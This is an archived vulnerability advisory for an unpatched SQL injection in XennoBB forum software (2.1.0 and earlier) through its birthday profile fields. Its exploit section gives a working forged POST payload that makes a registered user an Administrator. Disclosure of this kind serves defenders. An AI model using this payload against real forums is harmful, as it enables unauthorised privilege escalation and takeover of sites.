TUCoPS :: Web BBS :: etc :: b06-4061.htm

XennoBB <= 2.1.0 "birthday" SQL injection
XennoBB <= 2.1.0 "birthday" SQL injection
XennoBB <= 2.1.0 "birthday" SQL injection


--------------------- SUMMARY ---------------------=0D
=0D
Name:=0D
	XennoBB "birthday" SQL Injection (6/8/2006)=0D
=0D
Vendor / Product:=0D
	XennoBB Group=0D
http://www.xennobb.com/=0D 
	=0D
	Description:=0D
	The world's most revolutionary and easy to use bulletin board.=0D
=0D
	Revolutionary because it redefines the boundaries of usability=0D
	and power; from the first version it's a real alternative to=0D
	the commercial forums out there.=0D
=0D
	How can XennoBB be described in few words? =0D
	Lightning-speed, stable, SECURED(?) and modern.=0D
	=0D
Version(s) Affected:=0D
	<= 2.1.0=0D
	=0D
Severity:=0D
	High=0D
	=0D
Impact:=0D
	SQL Injection (Remote)=0D
=0D
Status:=0D
	Unpatched=0D
	=0D
Discovered by:=0D
Chris Boulton =0D 
	=0D
------------------- DESCRIPTION -------------------=0D
=0D
An exploit exists in the above mentioned versions of XennoBB which=0D
can be exploited by malicious users to conduct SQL injection attacks.=0D
=0D
Input passed to the "bday_day", "bday_month" and "bday_year form=0D
fields is not properly sanitised before being used in an SQL query.=0D
This exploit can lead to manipulation of SQL queries by injecting=0D
arbitary SQL code.=0D
=0D
--------------------- EXPLOIT ---------------------=0D
=0D
Submit a forged POST request to=0D
=0D
/profile.php?section=personal&id={your registered user ID here}=0D
=0D
With the following as the POST data:=0D
=0D
form_sent=1&form[sex]=a&bday_day=1&bday_month=2&bday_year=", group_id=1, birthday="=0D
=0D
Successful exploitation leads to the user group being changed to=0D
that of Administrators.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH